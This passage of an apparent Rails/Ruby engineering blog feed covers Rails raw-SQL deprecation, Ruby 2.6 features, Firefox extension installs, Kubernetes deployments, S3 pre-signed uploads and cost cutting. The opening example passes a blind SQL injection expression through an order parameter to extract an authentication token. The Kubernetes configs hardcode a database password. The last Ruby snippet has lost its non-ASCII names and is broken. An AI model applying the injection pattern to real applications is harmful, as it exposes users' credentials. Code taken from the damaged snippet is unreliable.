=&gt; #&lt;ActiveRecord::Relation [#&lt;User id: 1, email: &quot;piyush@example.com&quot;, authentication_token: &quot;Vkn5jpV_zxhqkNesyKSG&quot;&gt;]&gt;</code></pre><p>In Rails 6, this will result in an error.</p><p>In Rails 5.2, if we want to run raw SQL without getting the above warning, we have to change raw SQL string literals to an <code>Arel::Nodes::SqlLiteral</code> object.</p><pre><code class="language-ruby">irb(main):003:0&gt; Arel.sql('title')
=&gt; &quot;title&quot;
irb(main):004:0&gt; Arel.sql('title').class
=&gt; Arel::Nodes::SqlLiteral
irb(main):006:0&gt; User.order(Arel.sql(&quot;#{params[:order]} ASC&quot;))
  User Load (1.2ms)  SELECT  &quot;users&quot;.* FROM &quot;users&quot; ORDER BY (CASE SUBSTR(authentication_token, 1, 1) WHEN 'k' THEN 0 else 1 END) ASC
=&gt; #&lt;ActiveRecord::Relation [#&lt;User id: 1, email: &quot;piyush@example.com&quot;, authentication_token: &quot;Vkn5jpV_zxhqkNesyKSG&quot;&gt;]&gt;</code></pre><p>This should be done with care and should never be done with user input.</p><p>Here are the relevant <a href="https://github.com/rails/rails/pull/27947/files">commit</a> and <a href="https://github.com/rails/rails/pull/27947">discussion</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds RubyVM::AST module]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-adds-rubyvm-ast-module"/>
      <updated>2018-10-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-adds-rubyvm-ast-module</id>
      <content type="html"><![CDATA[<p>Ruby 2.6 added <code>RubyVM::AST</code> to generate the <a href="https://en.wikipedia.org/wiki/Abstract_syntax_tree">Abstract Syntax Tree</a> of code. Please note that this feature is experimental and under active development.</p><p>As of now, <code>RubyVM::AST</code> supports two methods: <code>parse</code> and <code>parse_file</code>.</p><p>The <code>parse</code> method takes a string as a parameter and returns the root node of the tree as a <code>RubyVM::AST::Node</code> object.</p><p>The <code>parse_file</code> method takes a file name as a parameter and returns the root node of the tree as a <a href="https://ruby-doc.org/core-2.6.0.preview2/RubyVM/AST/Node.html">RubyVM::AST::Node</a> object.</p><h4>Ruby 2.6.0-preview2</h4><pre><code class="language-ruby">irb&gt; RubyVM::AST.parse(&quot;(1..100).select { |num| num % 5 == 0 }&quot;)
=&gt; #&lt;RubyVM::AST::Node(NODE_SCOPE(0) 1:0, 1:38): &gt;
irb&gt; RubyVM::AST.parse_file(&quot;/Users/amit/app.rb&quot;)
=&gt; #&lt;RubyVM::AST::Node(NODE_SCOPE(0) 1:0, 1:38): &gt;</code></pre><p><a href="https://ruby-doc.org/core-2.6.0.preview2/RubyVM/AST/Node.html">RubyVM::AST::Node</a> has seven public instance methods: <code>children</code>, <code>first_column</code>, <code>first_lineno</code>, <code>inspect</code>, <code>last_column</code>, <code>last_lineno</code> and <code>type</code>.</p><h4>Ruby 2.6.0-preview2</h4><pre><code class="language-ruby">irb&gt; ast_node = RubyVM::AST.parse(&quot;(1..100).select { |num| num % 5 == 0 }&quot;)
=&gt; #&lt;RubyVM::AST::Node(NODE_SCOPE(0) 1:0, 1:38): &gt;
irb&gt; ast_node.children
=&gt; [nil, #&lt;RubyVM::AST::Node(NODE_ITER(9) 1:0, 1:38): &gt;]
irb&gt; ast_node.first_column
=&gt; 0
irb&gt; ast_node.first_lineno
=&gt; 1
irb&gt; ast_node.inspect
=&gt; &quot;#&lt;RubyVM::AST::Node(NODE_SCOPE(0) 1:0, 1:38): &gt;&quot;
irb&gt; ast_node.last_column
=&gt; 38
irb&gt; ast_node.last_lineno
=&gt; 1
irb&gt; ast_node.type
=&gt; &quot;NODE_SCOPE&quot;</code></pre><p>This module will be of great help in building static code analyzers and formatters.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Inline Installation of Firefox Extension]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/inline-installation-of-firefox-extension"/>
      <updated>2018-09-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/inline-installation-of-firefox-extension</id>
      <content type="html"><![CDATA[<h2>Inline Installation</h2><p>Firefox extensions, similar to Chrome extensions, help us modify and personalize our browsing experience by adding new features to existing sites.</p><p>Once we've published our extension to <a href="https://addons.mozilla.org/">Mozilla's Add-on store (AMO)</a>, users who browse the AMO can find the extension and install it with one click. But if a user is already on our site, where a link is provided to the extension's AMO listing page, they would need to navigate away from our website to the AMO, complete the install process, and then return to our site. That is a bad user experience.</p><p>Inline installation enables us to initiate the extension installation from our own site. The extension can still be hosted on the AMO, but users no longer have to leave our site to install it.</p><p>We had to try out a few suggested approaches before we got it working.</p><h2>InstallTrigger</h2><p><code>InstallTrigger</code> is an interface included in Mozilla's Apps API for installing extensions. Using JavaScript, the <code>install</code> method of <code>InstallTrigger</code> can be used to start the download and installation of an extension (or anything packaged in a .xpi file) from a web page.</p><p>An XPI (pronounced &quot;zippy&quot;) file is similar to a zip file, and contains the manifest file and the install script for the extension.</p><p>So, let's try to install the Grammarly extension for Firefox. To do so, we first need the location of its .xpi file. Once we have published our extension on the AMO, we can navigate to its listing page and get the link to the .xpi.</p><p>For our present example, here's the listing page for the <a href="https://addons.mozilla.org/en-US/firefox/addon/grammarly-1/">Grammarly Extension</a>.</p><p>Here, we can get the .xpi file's location by right clicking on the <code>+ Add to Firefox</code> button and clicking on <code>Copy Link Location</code>. Note that the <code>+ Add to Firefox</code> button is only visible if we browse the link in a Firefox browser. Otherwise, it is replaced by a <code>Get Firefox Now</code> button.</p><p>Once we have the URL, we can trigger the installation via JavaScript on our web page.</p><pre><code class="language-javascript">InstallTrigger.install({
  &quot;Name of the Extension&quot;: {
    URL: &quot;url pointing to the .xpi file's location on AMO&quot;,
  },
});</code></pre><h2>Pointing to the latest version of the Extension</h2><p>The .xpi URL used in the above code is specific to the extension's current version. If the extension has an update, the installed extensions of existing users are updated automatically, but the URL to the .xpi on our website would still point to the older version. Although the old link would keep working, we would always want new users to download the latest version.</p><p>To do that, we can fetch the listing page in the background and parse the HTML to get the latest link, but that approach can break if the HTML changes. Alternatively, we can query the Addons Services API, which returns the information for the extension in XML format.</p><p>For the Grammarly extension, we first need its slug id. We can get it by looking at its listing page's URL. From <code>https://addons.mozilla.org/en-US/firefox/addon/grammarly-1/</code>, we can note down the slug, which is <code>grammarly-1</code>.</p><p>Using this slug id, we can now get the extension details from <code>https://services.addons.mozilla.org/en-US/firefox/api/1.5/addon/grammarly-1</code>. It returns the info for the Grammarly extension. What we are particularly interested in is the value in the <code>&lt;install&gt;</code> node. That is the URL of the latest version of the .xpi.</p><p>Let's see how we can implement the whole thing using React.</p><pre><code class="language-javascript">import React, { Component } from &quot;react&quot;;
import axios from &quot;axios&quot;;
import cheerio from &quot;cheerio&quot;;

const FALLBACK_GRAMMARLY_EXTENSION_URL =
  &quot;https://addons.mozilla.org/firefox/downloads/file/1027073/grammarly_for_firefox-8.828.1757-an+fx.xpi&quot;;
const URL_FOR_FETCHING_XPI = `https://services.addons.mozilla.org/en-US/firefox/api/1.5/addon/grammarly-1`;

export default class InstallExtension extends Component {
  state = {
    grammarlyExtensionUrl: FALLBACK_GRAMMARLY_EXTENSION_URL,
  };

  componentWillMount() {
    axios.get(URL_FOR_FETCHING_XPI).then((response) =&gt; {
      const xml = response.data;
      const $ = cheerio.load(xml);
      const grammarlyExtensionUrl = $(&quot;addon install&quot;).text();
      this.setState({ grammarlyExtensionUrl });
    });
  }

  triggerInlineInstallation = (event) =&gt; {
    InstallTrigger.install({
      Grammarly: { URL: this.state.grammarlyExtensionUrl },
    });
  };

  render() {
    return (
      &lt;Button onClick={this.triggerInlineInstallation}&gt;
        Install Grammarly Extension
      &lt;/Button&gt;
    );
  }
}</code></pre><p>In the above code, we are using the npm packages <a href="https://github.com/axios/axios">axios</a> for fetching the XML and <a href="https://github.com/cheeriojs/cheerio">cheerio</a> for parsing it. We have also set a fallback URL as the initial value in case fetching the new URL from the XML response fails.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Use parametrized containers to deploy Rails microservices]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/deploying-rails-applications-with-parmaetrized-containers"/>
      <updated>2018-09-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/deploying-rails-applications-with-parmaetrized-containers</id>
      <content type="html"><![CDATA[<p>When using microservices with containers, one has to consider <strong>modularity</strong> and <strong>reusability</strong> while designing a system.</p><p>While using Kubernetes as a distributed system for container deployments, modularity and reusability can be achieved by using parameterized containers to deploy microservices.</p><h2>Parameterized containers</h2><p>If we think of a container as a function in a program, how many parameters does it have? Each parameter represents an input that can customize a generic container to a specific situation.</p><p>Let's assume we have a Rails application split into services like puma, sidekiq/delayed-job and websocket. Each service runs as a separate deployment in a separate container for the same application. When deploying a change, we should build the same image for all three containers, but each container should run a different process. In our case, we will be running 3 pods with the same image. This can be achieved by building a generic image for the containers. The generic container must accept parameters to run different services.</p><p>We need to expose parameters and consume them inside the container. There are two ways to pass parameters to our container.</p><ol><li>Using environment variables.</li><li>Using command line arguments.</li></ol><p>In this article, we will use environment variables to run parameterized containers like puma, sidekiq/delayed-job and websocket for Rails applications on Kubernetes.</p><p>We will deploy <a href="https://github.com/bigbinary/wheel">wheel</a> on Kubernetes using the parameterized container approach.</p><h4>Pre-requisites</h4><ul><li><p>Understanding of <a href="https://docs.docker.com/engine/reference/builder/">Dockerfile</a> and image building.</p></li><li><p>Access to a working Kubernetes cluster.</p></li><li><p>Understanding of <a href="http://kubernetes.io/">Kubernetes</a> terms like <a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>, <a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>, <a href="https://kubernetes.io/docs/concepts/services-networking/service/">services</a>, <a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/">configmap</a>, and <a href="https://kubernetes.io/docs/concepts/overview/working-with-objects/annotations/">annotations</a>.</p></li></ul><h3>Building a generic container image</h3><p>The Dockerfile in wheel uses the bash script <code>setup_while_container_init.sh</code> as the command to start the container. The script is self-explanatory and, as we can see, it consists of two functions, <code>web</code> and <code>background</code>. Function <code>web</code> starts the puma service and <code>background</code> starts the delayed_job service.</p><p>We create two different deployments on Kubernetes for the web and background services. Deployment templates are identical for both web and background.
The value of the environment variable <code>POD_TYPE</code> passed to the init script determines which service runs in a pod.</p><p>Once we have the docker image built, let's deploy the application.</p><h3>Creating Kubernetes deployment manifests for the wheel application</h3><p>Wheel uses a PostgreSQL database, so we need a postgres service to run the application. We will use the postgres image from Docker Hub and deploy it as a deployment.</p><p><strong>Note:</strong> For production deployments, the database should be deployed as a statefulset, or a managed database service should be used.</p><p>K8s manifest for deploying PostgreSQL:</p><pre><code class="language-yaml">---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  labels:
    app: db
  name: db
spec:
  replicas: 1
  template:
    metadata:
      labels:
        app: db
    spec:
      containers:
        - image: postgres:9.4
          name: db
          env:
            - name: POSTGRES_USER
              value: postgres
            - name: POSTGRES_PASSWORD
              value: welcome
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: db
  name: db
spec:
  ports:
    - name: headless
      port: 5432
      targetPort: 5432
  selector:
    app: db</code></pre><p>Create the Postgres DB and the service.</p><pre><code class="language-bash">$ kubectl create -f db-deployment.yml -f db-service.yml
deployment db created
service db created</code></pre><p>Now that the DB is available, we need to access it from the application using <code>database.yml</code>.</p><p>We will create a configmap to store the database credentials and mount it at <code>config/database.yml</code> in our application deployments.</p><pre><code class="language-yaml">---
apiVersion: v1
kind: ConfigMap
metadata:
  name: database-config
data:
  database.yml: |
    development:
      adapter: postgresql
      database: wheel_development
      host: db
      username: postgres
      password: welcome
      pool: 5
    test:
      adapter: postgresql
      database: wheel_test
      host: db
      username: postgres
      password: welcome
      pool: 5
    staging:
      adapter: postgresql
      database: postgres
      host: db
      username: postgres
      password: welcome
      pool: 5</code></pre><p>Create the configmap for database.yml.</p><pre><code class="language-bash">$ kubectl create -f database-configmap.yml
configmap database-config created</code></pre><p>We have the database ready for our application; now let's proceed to deploy our Rails services.</p><h3>Deploying Rails microservices using the same docker image</h3><p>In this blog, we will limit our services to web and background, each with its own Kubernetes deployment.</p><p>Let's create a deployment and service for our web application.</p><pre><code class="language-yaml">---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: wheel-web
  labels:
    app: wheel-web
spec:
  replicas: 1
  template:
    metadata:
      labels:
        app: wheel-web
    spec:
      containers:
      - image: bigbinary/wheel:generic
        name: web
        imagePullPolicy: Always
        env:
        - name: DEPLOY_TIME
          value: $date
        - name: POD_TYPE
          value: WEB
        ports:
        - containerPort: 80
        volumeMounts:
          - name: database-config
            mountPath: /wheel/config/database.yml
            subPath: database.yml
      volumes:
        - name: database-config
          configMap:
            name: database-config
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: wheel-web
  name: web
spec:
  ports:
  - name: puma
    port: 80
    targetPort: 80
  selector:
    app: wheel-web
  type: LoadBalancer</code></pre><p>Note that we set <code>POD_TYPE</code> to <code>WEB</code>, which makes the container startup script start the puma process.</p><p>Let's create the web/puma deployment and service.</p><pre><code class="language-bash">kubectl create -f web-deployment.yml -f web-service.yml
deployment wheel-web created
service web created</code></pre><pre><code class="language-yaml">---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: wheel-background
  labels:
    app: wheel-background
spec:
  replicas: 1
  template:
    metadata:
      labels:
        app: wheel-background
    spec:
      containers:
        - image: bigbinary/wheel:generic
          name: background
          imagePullPolicy: Always
          env:
            - name: DEPLOY_TIME
              value: $date
            - name: POD_TYPE
              value: background
          ports:
            - containerPort: 80
          volumeMounts:
            - name: database-config
              mountPath: /wheel/config/database.yml
              subPath: database.yml
      volumes:
        - name: database-config
          configMap:
            name: database-config
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: wheel-background
  name: background
spec:
  ports:
    - name: background
      port: 80
      targetPort: 80
  selector:
    app: wheel-background</code></pre><p>For background/delayed-job we set <code>POD_TYPE</code> to <code>background</code>, which starts the delayed-job process.</p><p>Let's create the background deployment and the service.</p><pre><code class="language-bash">kubectl create -f background-deployment.yml -f background-service.yml
deployment wheel-background created
service background created</code></pre><p>Get the application endpoint.</p><pre><code class="language-bash">$ kubectl get svc web -o wide | awk '{print $4}'
a55714dd1a22d11e88d4b0a87a399dcf-2144329260.us-east-1.elb.amazonaws.com</code></pre><p>We can access the application using the endpoint.</p><p>Now let's see the pods.</p><pre><code class="language-bash">$ kubectl get pods
NAME                                READY     STATUS    RESTARTS   AGE
db-5f7d5c96f7-x9fll                 1/1       Running   0          1h
wheel-background-6c7cbb4c75-sd9sd   1/1       Running   0          30m
wheel-web-f5cbf47bd-7hzp8           1/1       Running   0          10m</code></pre><p>We see that the <code>db</code> pod is running postgres, the <code>wheel-web</code> pod is running puma and the <code>wheel-background</code> pod is running delayed job.</p><p>If we check the logs, everything coming to puma is handled by the web pod, and all the background jobs are handled by the background pod.</p><p>Similarly, if we are using websockets or separate API pods, traffic will be routed to the respective services.</p><p>This is how we can deploy Rails microservices using parametrized containers and a generic image.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Configuring memory allocation in ImageMagick]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/configuring-memory-allocation-in-imagemagick"/>
      <updated>2018-09-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/configuring-memory-allocation-in-imagemagick</id>
      <content type="html"><![CDATA[<p>ImageMagick has a security policy file, <a href="https://www.imagemagick.org/source/policy.xml">policy.xml</a>, using which we can control and limit the execution of the program. For example, the default memory limit of ImageMagick-6 is 256 MiB.</p><p>Recently, we saw the following error while processing a gif image.</p><pre><code class="language-text">convert-im6.q16: DistributedPixelCache '127.0.0.1' @ error/distribute-cache.c/ConnectPixelCacheServer/244.
convert-im6.q16: cache resources exhausted `file.gif' @ error/cache.c/OpenPixelCache/3945.</code></pre><p>This happens when ImageMagick cannot allocate enough memory to process the image. It can be fixed by tweaking the memory configuration in <code>policy.xml</code>.</p><p>The path of <code>policy.xml</code> can be located as follows.</p><pre><code class="language-text">$ identify -list policy
Path: /etc/ImageMagick-6/policy.xml
  Policy: Resource
    name: disk
    value: 1GiB</code></pre><p>The memory limit can be configured in the following line of <code>policy.xml</code>.</p><pre><code class="language-xml">&lt;policy domain=&quot;resource&quot; name=&quot;memory&quot; value=&quot;256MiB&quot;/&gt;</code></pre><p>Increasing this value would solve the error, provided the machine has enough memory.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Upload direct to S3 with Pre-signed POST request]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/uploading-files-directly-to-s3-using-pre-signed-post-request"/>
      <updated>2018-09-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/uploading-files-directly-to-s3-using-pre-signed-post-request</id>
      <content type="html"><![CDATA[<p>It's easy to create a form in Rails which can upload a file to the backend. The backend can then take the file and upload it to S3. We can do that by using gems like <a href="https://github.com/thoughtbot/paperclip">paperclip</a> or <a href="https://github.com/carrierwaveuploader/carrierwave">carrierwave</a>. Or, if we are using Rails 5.2, we can use <a href="https://github.com/rails/rails/tree/master/activestorage">Active Storage</a>.</p><p>But for applications where Rails is used only as an API backend, uploading via a form is not an option. In this case, we can expose an endpoint which accepts files, and then Rails can handle uploading to S3.</p><p>In most cases, the above solution works. But recently, in one of our applications which is hosted at <a href="https://www.heroku.com/">Heroku</a>, we faced time-out related problems while uploading large files. Here is what Heroku's <a href="https://devcenter.heroku.com/articles/request-timeout">docs</a> say about how long a request can take.</p><blockquote><p>The router terminates the request if it takes longer than 30 seconds to complete.</p></blockquote><h2>Pre-signed POST request</h2><p>An obvious solution is to upload the files directly to S3. However, in order to do that, the client needs AWS credentials, which is not ideal. If the client is a Single Page Application, the AWS credentials would be visible in the javascript files. Or, if the client is a mobile app, someone might be able to reverse engineer the application and get hold of the AWS credentials.</p><p>Here's where the pre-signed POST request comes to the rescue. Here are the <a href="https://docs.aws.amazon.com/AmazonS3/latest/dev/PresignedUrlUploadObject.html">official docs</a> from AWS on this topic.</p><p>Uploading via pre-signed POST is a two step process. The client first requests permission to upload the file. The backend receives the request, generates the pre-signed URL and returns the response along with other fields. The client can then upload the file to the URL received in the response.</p><h2>Implementation</h2><p>Add the AWS gem to your Gemfile and run <code>bundle install</code>.</p><pre><code class="language-ruby">gem 'aws-sdk'</code></pre><p>Get a handle to the S3 bucket using the AWS credentials.</p><pre><code class="language-ruby">aws_credentials = Aws::Credentials.new(
  ENV['AWS_ACCESS_KEY_ID'],
  ENV['AWS_SECRET_ACCESS_KEY']
)

s3_bucket = Aws::S3::Resource.new(
  region: 'us-east-1',
  credentials: aws_credentials
).bucket(ENV['S3_BUCKET'])</code></pre><p>The controller handling the request for the presigned URL should have the following code.</p><pre><code class="language-ruby">def request_for_presigned_url
  presigned_url = s3_bucket.presigned_post(
    key: &quot;#{Rails.env}/#{SecureRandom.uuid}/${filename}&quot;,
    success_action_status: '201',
    signature_expiration: (Time.now.utc + 15.minutes)
  )

  data = { url: presigned_url.url, url_fields: presigned_url.fields }

  render json: data, status: :ok
end</code></pre><p>In the above code, we are creating a presigned URL using the <code>presigned_post</code> method.</p><p>The <strong>key</strong> option specifies the path where the file will be stored. AWS supports a custom <code>${filename}</code> directive for the key option. This directive tells S3 that if a user uploads a file named <code>image.jpg</code>, then S3 should store the file with the same name. In S3, we cannot have duplicate keys, so we are using <code>SecureRandom</code> to generate a unique prefix so that two files with the same name can be stored.</p><p>If a file is successfully uploaded, the client receives the HTTP status code given under the key <code>success_action_status</code>. If the client sets its value to <code>200</code> or <code>204</code> in the request, Amazon S3 returns an empty document along with <code>200</code> or <code>204</code> as the HTTP status code. We set it to <code>201</code> here because we want the client to notify us with the <a href="https://docs.aws.amazon.com/AmazonS3/latest/dev/Introduction.html#BasicsKeys">S3 key</a> where the file was uploaded to. The S3 key is present in the XML document which is received as a response from AWS only when the status code is <code>201</code>.</p><p><code>signature_expiration</code> specifies when the signature on the POST will expire. It defaults to one hour from the creation of the presigned POST and should not exceed one week from the creation time. Here, we are setting it to 15 minutes.</p><p>Other configuration options can be found <a href="https://docs.aws.amazon.com/sdkforruby/api/Aws/S3/Bucket.html#presigned_post-instance_method">here</a>.</p><p>In response to the above request, we send out a JSON which contains the URL and the fields required for making the upload.</p><p>Here's a sample response.</p><pre><code class="language-json">{
  &quot;url&quot;: &quot;https://s3.amazonaws.com/&lt;some-s3-url&gt;&quot;,
  &quot;url_fields&quot;: {
    &quot;key&quot;: &quot;development/8614bd40-691b-4668-9241-3b342c6cf429/${filename}&quot;,
    &quot;success_action_status&quot;: &quot;201&quot;,
    &quot;policy&quot;: &quot;&lt;s3-policy&gt;&quot;,
    &quot;x-amz-credential&quot;: &quot;********************/20180721/us-east-1/s3/aws4_request&quot;,
    &quot;x-amz-algorithm&quot;: &quot;AWS4-HMAC-SHA256&quot;,
    &quot;x-amz-date&quot;: &quot;20180721T144741Z&quot;,
    &quot;x-amz-signature&quot;: &quot;&lt;hexadecimal-signature&gt;&quot;
  }
}</code></pre><p>Once the client gets the above credentials, it can proceed with the actual file upload.</p><p>The client can be anything: an iOS app, an Android app, an SPA or even a Rails app. For our example, let's assume it's a node client.</p><pre><code class="language-javascript">var request = require(&quot;request&quot;);

function uploadFileToS3(response) {
  var options = {
    method: 'POST',
    url: response.url,
    formData: {
      ...response.url_fields,
      file: &lt;file-object-for-upload&gt;
    }
  };

  request(options, (error, response, body) =&gt; {
    if (error) throw new Error(error);
    console.log(body);
  });
}</code></pre><p>Here, we are making a POST request to the URL received from the earlier presigned response. Note that we are using the <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Spread_syntax">spread operator</a> to pass <code>url_fields</code> in the formData.</p><p>When the POST request is successful, the client receives an XML response from S3, because we set the response code to be 201. A sample response looks like the following.</p><pre><code class="language-xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;PostResponse&gt;
    &lt;Location&gt;https://s3.amazonaws.com/link-to-the-file&lt;/Location&gt;
    &lt;Bucket&gt;s3-bucket&lt;/Bucket&gt;
    &lt;Key&gt;development/8614bd40-691b-4668-9241-3b342c6cf429/image.jpg&lt;/Key&gt;
    &lt;ETag&gt;&quot;32-bit-tag&quot;&lt;/ETag&gt;
&lt;/PostResponse&gt;</code></pre><p>Using the above response, the client can then let the API know where the file was uploaded by sending the value from the <code>Key</code> node. This can be optional in some cases, depending on whether the API actually needs this info.</p><h2>Advantages</h2><p>Using AWS S3 presigned URLs has a few advantages.</p><ul><li><p>The main advantage of uploading directly to S3 is that there is considerably less load on the application server, since the server is now free from handling the receiving of files and transferring them to S3.</p></li><li><p>Since the file upload happens directly on S3, we can bypass the 30 second Heroku time limit.</p></li><li><p>AWS credentials are not shared with the client application, so no one can get their hands on your AWS keys.</p></li><li><p>The generated presigned URL can be initialized with an expiration time, so the URLs and the signatures generated become invalid after that time period.</p></li><li><p>The client does not need to install any of the AWS libraries. It just needs to upload the file via a simple POST request to the generated URL.</p></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Reducing infrastructure cost by 10% for ECommerce app]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/how-we-reduced-infrastructure-cost-e-commerce-project"/>
      <updated>2018-08-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-we-reduced-infrastructure-cost-e-commerce-project</id>
      <content type="html"><![CDATA[<p>Recently, we got an opportunity to reduce the infrastructure cost of a medium-sized e-commerce project. In this blog we discuss how we reduced the total infrastructure cost by 10%.</p><h2>Changes to MongoDB instances</h2><p>Depending on the requirements, modern web applications use different third-party services. For example, it's easier and more cost effective to subscribe to a GeoIP lookup service than to build and maintain one. Some third-party services get very expensive as usage increases, but people don't look for alternatives due to legacy reasons.</p><p>In our case, our client had been paying more than $5,000/month for a third-party MongoDB service. This service charges based on the storage used, and we had years of data in it. This data is consumed by a machine learning system to fight fraudulent purchases and users. We had a look at both the ML system and the data in MongoDB and found we actually didn't need all the data in the database. The system never read data older than 30-60 days in some of the biggest mongo collections.</p><p>Since we were already using <a href="https://www.nomadproject.io/">nomad</a> as our scheduler, we wrote a periodic nomad job that runs every week to delete the unnecessary data. The nomad job syncs both primary and secondary MongoDB instances to release the free space back to the OS. This helped reduce the monthly bill to $630/month.</p><h2>Changes to MongoDB service provider</h2><p>Then we looked at the MongoDB service provider. It was configured years back when the application was built, and other vendors now provide the same service for a much cheaper price. We switched our MongoDB to mLab and now the database runs in a $180/month dedicated cluster.
With WiredTiger's <a href="https://docs.mongodb.com/manual/core/wiredtiger/#compression">compression</a> enabled, we don't use as much storage as we used to.</p><h2>Making use of Auto Scaling</h2><p>Auto Scaling can be a powerful tool when it comes to reducing costs. We had been running around 15 large EC2 instances. This was inefficient for the following two reasons.</p><ol><li>The fleet cannot cope when traffic increases beyond its limit.</li><li>Resources are underused when traffic is low.</li></ol><p>Auto Scaling solves both issues. For web servers, we switched to smaller instances and used a <a href="https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-scaling-target-tracking.html">Target Tracking Scaling Policy</a> to keep the average aggregate CPU utilization at 70%.</p><p>Background job workers made use of a nomad job we built. It periodically calculated the number of required instances based on the count of pending jobs and each queue's priority. This number was pushed to CloudWatch as a metric, and the Auto Scaling group scaled based on that. This approach was effective in boosting performance and reducing cost.</p><h2>Buying reserved instances</h2><p>AWS has a feature to reserve instances for services like EC2, RDS, etc. It's often preferable to buy reserved instances rather than running the application on on-demand instances. We evaluated reserved instance utilization using the <a href="https://console.aws.amazon.com/cost-reports/home?#/ri/utilization">reporting tool</a> and bought the required reserved instances.</p><h2>Looking for cost-effective solutions</h2><p>Sometimes, different solutions to the same problem can have very different costs. For example, we had been facing small DDoS attacks regularly and had to rate-limit requests based on IP and other parameters. Since we had been using Cloudflare, we could have used their rate-limiting feature. Performance wise, it was the best solution, but they charge based on the number of good requests. It would be expensive for us since it's a high-traffic application. We looked for other solutions and solved the problem using Rack::Attack. We <a href="https://blog.bigbinary.com/2018/05/15/how-to-mitigate-ddos-using-rack-attack.html">wrote a blog</a> about it some time back. The solution presented in the blog was effective in mitigating the DDoS attacks we faced and didn't cost us anything significant.</p><h2>Requesting custom pricing</h2><p>If you are a comparatively large customer of a third-party service, it's likely that you don't have to pay the published price. Instead, you can request custom pricing. Many companies will be happy to give 20% to 50% discounts if you can commit to a minimum spend for the year. We negotiated a new contract for an expensive third-party service and got the deal at a 40% discount compared to their published minimum price.</p><p>Running an infrastructure can be both technically and economically challenging. But if we look closely and are willing to update existing systems, we would be amazed at how much money we can save every month.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds Enumerable#filter as alias of Enumerable#select]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-adds-enumerable-filter-as-an-alias-of-enumerable-select"/>
      <updated>2018-08-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-adds-enumerable-filter-as-an-alias-of-enumerable-select</id>
      <content type="html"><![CDATA[<p>Ruby 2.6 has added <code>Enumerable#filter</code> as an alias of <code>Enumerable#select</code>. The
reason for adding <code>Enumerable#filter</code> as an alias is to make it easier for
people coming from other languages to use Ruby. A lot of other languages,
including Java, R, PHP etc., have a filter method to filter/select records based
on a condition.</p><p>Let's take an example in which we have to select/filter all numbers which are
divisible by 5 from a range.</p><h4>Ruby 2.5</h4><pre><code class="language-ruby">irb&gt; (1..100).select { |num| num % 5 == 0 }
=&gt; [5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95, 100]

irb&gt; (1..100).filter { |num| num % 5 == 0 }
Traceback (most recent call last):
        2: from /Users/amit/.rvm/rubies/ruby-2.5.1/bin/irb:11:in `&lt;main&gt;'
        1: from (irb):2
NoMethodError (undefined method `filter' for 1..100:Range)</code></pre><h4>Ruby 2.6.0-preview2</h4><pre><code class="language-ruby">irb&gt; (1..100).select { |num| num % 5 == 0 }
=&gt; [5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95, 100]

irb&gt; (1..100).filter { |num| num % 5 == 0 }
=&gt; [5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95, 100]</code></pre><p>Also note that along with <code>Enumerable#filter</code>, <code>Enumerable#filter!</code>
was added as an alias of <code>Enumerable#select!</code>.</p><p>Here are the relevant <a href="https://github.com/ruby/ruby/commit/b1a8c64483">commit</a>
and <a href="https://bugs.ruby-lang.org/issues/13784">discussion</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds support for non-ASCII capital letter]]></title>
       <author><name>Rohan Pujari</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2.6-adds-support-for-non-ascii-capital-case-constant"/>
      <updated>2018-08-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2.6-adds-support-for-non-ascii-capital-case-constant</id>
      <content type="html"><![CDATA[<p>Before Ruby 2.6, a constant had to have a capital ASCII letter as the first
character. This means class and module names could not start with a non-ASCII capital
character.</p><p>The below code will raise a <code>class/module name must be CONSTANT</code> exception.</p><pre><code class="language-ruby">class 
end</code></pre><p>We can use the above non-ASCII character as a method name or variable name, though.</p><p>The below code will run without any exception.</p><pre><code class="language-ruby">class NonAsciiMethodAndVariable
  def 
     = &quot;BigBinary&quot;
  end
